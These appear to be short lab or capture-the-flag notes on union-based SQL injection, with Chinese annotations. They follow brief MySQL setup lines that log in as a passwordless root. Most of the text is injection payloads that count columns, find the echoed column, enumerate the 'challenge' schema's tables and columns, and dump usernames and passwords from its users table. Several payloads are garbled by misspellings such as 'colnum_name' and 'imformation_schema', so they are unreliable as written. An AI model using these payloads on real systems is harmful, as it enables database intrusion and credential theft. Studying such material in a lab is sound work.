# Start the local MySQL service the notes below are run against (trailing ';' is a no-op in the shell).
service mysql start;
# Open the mysql client as root. No -p is given, so this relies on a passwordless root account
# (a fresh lab install); set one with ALTER USER before the instance is reachable by anyone else.
# NOTE(review): "use mysql;" is a statement typed at the mysql> prompt, not a shell command —
# on one line the shell would try to run "use" itself; it belongs on the next line.
mysql -u root -q;use mysql;
# Inside the client: list every database visible to the current account.
show databases;
id=1 order by 3 判断列数
id =-1 union select 1,2,3 判断回显位置
id=-1 union select 1,user(),database() 查询当前用户和数据库名
id=-1 union select 1,(select table_name from information_schema.tables where table_schema = 'challenge'),3 从‘challenge’数据库中查询表名
id=-1 union select 1,(select colnum_name from information_schema.colnum where table_schema='challenge' and table_name = table_name),3 从‘challenge’数据库中、表名为 table_name 的表里查询字段名
id=-1 union select 1,(select colnum_name from conum.table_name),3
/////id=-1 union select table_name from imformation_schema.tables where table_schema ='challenge'
id=-1 union select 1,(select group_concat(table_name)from imformation_schema.tables where table_schema ='challenge'),3
id=-1 union select 1,(select group_concat(concat(username,0x7e,password))from challenge.users),3
union 联合查询;
group_concat 将多行结果合并为一行;
concat 中的 0x7e（即 '~'）用作分隔符;